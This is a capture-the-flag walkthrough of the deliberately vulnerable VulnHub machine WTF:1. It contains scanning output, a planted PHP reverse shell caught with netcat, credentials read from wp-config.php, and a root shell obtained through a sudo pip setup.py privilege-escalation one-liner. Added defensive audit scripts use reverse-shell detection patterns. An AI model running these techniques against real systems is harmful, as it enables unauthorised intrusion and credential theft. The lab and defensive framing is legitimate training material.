VulnHub target machine penetration [WTF-1]

Name: WTF:1
Release date: 22 November 2019

Download:

  • Download: https://mega.nz/#!dmZGDQRa!eiUQN_w_qZODlonwe8RM5WsOHFrpi3wqIyFfVc2DyU0
  • Download (Mirror): https://download.vulnhub.com/wtf/wtf.rar
  • Download (Torrent): https://download.vulnhub.com/wtf/wtf.rar.torrent

Description:
Beginner to intermediate machine; your goal is to obtain /root/flag.txt.
Remember, good enumeration! Based on VMware; you may run into issues with VB.

Network configuration

When you first import and boot the VM you will hit the problem mentioned in the description: the machine does not get an IP address. See the article "Vulnhub靶机检测不到IP地址" (VulnHub target machine cannot detect an IP address); it is very detailed, so I won't repeat it here, just follow its steps to configure the network.

Information gathering

Run nmap:

root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.134
Host is up (0.00017s latency).
MAC Address: 00:0C:29:CA:25:F7 (VMware)
root@kali:~# nmap -sS -sV -T5 -A -p- -v --script=vuln 192.168.142.134
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.38 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.38:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10097 6.0 https://vulners.com/cve/CVE-2019-10097
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-0215 6.0 https://vulners.com/cve/CVE-2019-0215
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|_ CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092

Two ports are open: 22 and 80.

Install the SecLists wordlists (22.1k stars on GitHub):

root@kali:~# apt -y install seclists
正在读取软件包列表... 完成
正在分析软件包的依赖关系树
正在读取状态信息... 完成
下列软件包是自动安装的并且现在不需要了:
apt-file command-not-found libapt-pkg-perl libexporter-tiny-perl libisl21 libjim0.77
liblist-moreutils-perl libregexp-assemble-perl
使用'apt autoremove'来卸载它(它们)。
下列【新】软件包将被安装:
seclists
升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。
需要下载 276 MB 的归档。
解压缩后会消耗 1,033 MB 的额外空间。
获取:1 https://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 seclists all 2019.4-0kali2 [276 MB]
已下载 276 MB,耗时 45秒 (6,170 kB/s)
正在选中未选择的软件包 seclists。
(正在读取数据库 ... 系统当前共安装有 318480 个文件和目录。)
准备解压 .../seclists_2019.4-0kali2_all.deb ...
正在解压 seclists (2019.4-0kali2) ...
正在设置 seclists (2019.4-0kali2) ...

A gobuster scan turns up the zhkh directory:

root@kali:~# gobuster dir --url http://192.168.142.134/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.142.134/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/12/24 00:34:22 Starting gobuster
===============================================================
/javascript (Status: 301)
/server-status (Status: 403)
[ERROR] 2019/12/24 00:34:24 [!] parse http://192.168.142.134/error_log: net/url: invalid control character in URL
/zhkh (Status: 301)
===============================================================
2019/12/24 00:34:27 Finished
===============================================================

Visiting http://192.168.142.134/zhkh/ shows a site built on WordPress 5.3.

Adding a rule in Burp as shown in the figure below lets the full page load normally.

After brute-forcing the admin password and looking for WordPress vulnerabilities led nowhere, on to the next step.

Since the hint says "good enumeration", going into the wp-content/uploads/ directory turns up something new: shell.php.

Requesting shell.php produces an error message:

WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111) 

The error tells us this is php-reverse-shell, i.e. a PHP backdoor that spawns a reverse shell.

Capture traffic with Wireshark to see which IP and port php-reverse-shell connects back to, so that nc can later listen locally on it.

The callback IP is 192.168.1.14 and the port is 5555.
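As an added defensive example (not part of this walkthrough), a small POSIX shell audit that lists PHP files under a WordPress uploads directory, where none should exist, and flags the ones carrying php-reverse-shell's telltale strings; the directory layout and sample files are constructed.

```shell
#!/bin/sh
# Added defensive example (not the walkthrough's own code): audit a WordPress
# uploads directory for PHP files and flag those containing the strings
# pentestmonkey's php-reverse-shell is known for ("daemonise", fsockopen).
# Paths and sample files below are constructed so this runs offline.

# Print every PHP-like file under the given uploads directory, one per line,
# suffixed with " SUSPICIOUS" when it contains reverse-shell indicators.
audit_uploads() {
    dir="$1"
    find "$dir" -type f \( -iname '*.php' -o -iname '*.phtml' \
        -o -iname '*.php[3457]' -o -iname '*.phar' \) 2>/dev/null |
    sort |
    while IFS= read -r f; do
        if grep -qiE 'daemonise|fsockopen|proc_open|shell_exec|/bin/sh' "$f"; then
            printf '%s SUSPICIOUS\n' "$f"
        else
            printf '%s\n' "$f"
        fi
    done
}

# Build a constructed sample uploads tree: one image, one harmless PHP file,
# and a stand-in for the dropped shell.php carrying only the telltale strings.
make_sample_uploads() {
    d=$(mktemp -d)
    mkdir -p "$d/2019/11"
    printf 'not really a jpeg\n' > "$d/2019/11/photo.jpg"
    printf '<?php echo "hello";\n' > "$d/2019/11/notes.php"
    printf '<?php // daemonise\n$sock = fsockopen("192.0.2.1", 5555);\n' > "$d/shell.php"
    printf '%s\n' "$d"
}

# Usage on a real install: audit_uploads /var/www/html/zhkh/wp-content/uploads
```

On Apache with mod_php the structural fix is `php_admin_flag engine off` in a `<Directory>` block for wp-content/uploads, so a dropped PHP file cannot execute even if the upload path is abused again.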

getshell

Change the NAT network to 192.168.1.0/24, give Kali the static IP 192.168.1.14, reboot both Kali and the wtf machine, then request php-reverse-shell.

The shell comes back:

root@kali:~# nc -lvp 5555
listening on [any] 5555 ...
192.168.1.15: inverse host lookup failed: Unknown host
connect to [192.168.1.14] from (UNKNOWN) [192.168.1.15] 47192
Linux wtf 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
01:56:54 up 1 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@wtf:/$ ls
ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var

Privilege escalation

Check for SUID executables; nothing usable:

www-data@wtf:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/su
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

sudo -l asks for a password.

Go to /var/www/html/zhkh and read wp-config.php:

www-data@wtf:/var/www/html/zhkh$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_database' );

/** MySQL database username */
define( 'DB_USER', 'ra' );

/** MySQL database password */
define( 'DB_PASSWORD', '912391929129' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'hmdNSrpLV5we) E$0_/E,$Vxr0%<S{]D@)T+rc%a7wvbr)Q|bm7boJdOz/AN>/#&' );
define( 'SECURE_AUTH_KEY', 'DR&l3>0z8mmFT+Y}#bqND_~H;wb[r|:te+tN%:K PS7=~~/;uA5)zj~Z%tu}-8UJ' );
define( 'LOGGED_IN_KEY', '7+cns%lA?p60U~*(J,z9zp4w 2%hB1S6jZ0NuUgl(oK,#H6&GL,i@+4m:1w3|-aW' );
define( 'NONCE_KEY', 'm5,d=I4 MShd4lU#8F@@oj2cKpc+J[Kp3bRt%Sfuw.%#`oVKzgDMTl5+D[nu,R<K' );
define( 'AUTH_SALT', 'sl3w_.}n|M{~D#6,v]U?Kz/,k&oCnn1._|(i3Y|ng7+<-f4Nv7mmR4B<i>!?du#i' );
define( 'SECURE_AUTH_SALT', 'b>,[La8I5xqchTMvXN-bI8%[)-V[wHjNmj/1jZ_Vnq`q0<|E@6^.8~KpI_#53Rw_' );
define( 'LOGGED_IN_SALT', 'v_`E=EA]$UBa.2P|%YV4cl}(c@AVkW$V5959/gQL~a:,O}qfG85Xc4)=xRBux6g?' );
define( 'NONCE_SALT', 'TE#Tim,4h|zKYm$he[F%J*4vG{v]VK!jP0sSeBLHp7Mp|P*XJz:=&n<nsfbIFq>a' );

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

//`Db]f{He3HgO`(z

Trying ssh with ra/912391929129 from the config fails; trying ra/Db]f{He3HgO(z, the string in the trailing comment, logs in successfully. I really want to say: what the fuck!!!!!!

root@kali:~# ssh ra@192.168.1.15
The authenticity of host '192.168.1.15 (192.168.1.15)' can't be established.
ECDSA key fingerprint is SHA256:YRICww0bKH3fcEIycw4x9iWEv3gF1qtqElE7ecocCn8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.15' (ECDSA) to the list of known hosts.
ra@192.168.1.15's password:
Linux wtf 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 21 12:47:56 2019 from 192.168.1.13
ra@wtf:~$ ls
ra@wtf:~$ id
uid=1000(ra) gid=1000(ra) groups=1000(ra),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
ra@wtf:~$ pwd
/home/ra
ra@wtf:~$ whoami
ra
ra@wtf:~$ ls -la
total 28
drwxr-xr-x 3 ra ra 4096 Nov 21 15:04 .
drwxr-xr-x 3 root root 4096 Nov 21 06:45 ..
-rw------- 1 ra ra 480 Nov 21 15:01 .bash_history
-rw-r--r-- 1 ra ra 220 Nov 21 06:45 .bash_logout
-rw-r--r-- 1 ra ra 3526 Nov 21 06:45 .bashrc
drwx------ 3 ra ra 4096 Nov 21 14:18 .gnupg
-rw-r--r-- 1 ra ra 807 Nov 21 06:45 .profile
ra@wtf:~$
ra@wtf:~$ sudo -l
Matching Defaults entries for ra on wtf:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ra may run the following commands on wtf:
(root) NOPASSWD: /usr/bin/pip

/usr/bin/pip can be run as root without a password; searching online for a way to abuse this leads to GTFOBins:

ra@wtf:~$ TF=$(mktemp -d)
ra@wtf:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
ra@wtf:~$ sudo pip install $TF
Processing /tmp/tmp.FbYhS1oIjc
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
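An added defensive counterpart (not the walkthrough's own code): a POSIX shell audit that parses `sudo -l` output and reports NOPASSWD rules granting pip or similar binaries that execute arbitrary code, which is what made this box fall. The sample output is constructed after the session above, and the RISKY list is my own assumption of what to flag.

```shell
#!/bin/sh
# Added defensive example (not the walkthrough's own code): read the
# "User ... may run the following commands" section of `sudo -l` output and
# report NOPASSWD entries that hand out a binary able to run arbitrary code
# as root (pip on this box). Feed real output with: sudo -l | audit_sudo_l

# Binaries whose install/eval hooks execute arbitrary code (assumed list); an
# unrestricted NOPASSWD rule for any of these is equivalent to NOPASSWD: ALL.
RISKY='pip|pip3|python[0-9.]*|perl|ruby|gem|npm|apt|apt-get|vim?|less|find'

# Reads sudo -l output on stdin; prints "<runas> <command>" for each risky entry.
audit_sudo_l() {
    sed -n '/may run the following commands/,$p' |
    grep 'NOPASSWD' |
    while IFS= read -r line; do
        runas=$(printf '%s' "$line" | sed -n 's/^[[:space:]]*(\([^)]*\)).*/\1/p')
        cmds=$(printf '%s' "$line" | sed 's/.*NOPASSWD:[[:space:]]*//')
        # One rule may list several commands separated by commas.
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
            base=${cmd##*/}
            if [ "$cmd" = "ALL" ] || printf '%s' "$base" | grep -qxE "$RISKY"; then
                printf '%s %s\n' "$runas" "$cmd"
            fi
        done
    done
}

# Constructed sample mirroring the sudo -l output on this box, plus a benign
# service-restart rule that should not be flagged.
SAMPLE_SUDO_L='Matching Defaults entries for ra on wtf:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ra may run the following commands on wtf:
    (root) NOPASSWD: /usr/bin/pip
    (root) NOPASSWD: /usr/sbin/service apache2 restart'

# Returns the flagged entries for the constructed sample.
audit_sample() {
    printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
}
```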

Running the PoC gives root; then find the flag:

# cd /root
# ls
flag.txt
# cat flag.txt
WTF rooted!
haha, well done.
You can find me on discord to tell me your opinion about "WTF" -> pwn4magic#8707
#

Too cool.

Game over

Sorry, this time I still couldn't find that Greek guru's foolproof one-click walkthrough script. I am so sorry about this… It's a pity…

The end, to be continued…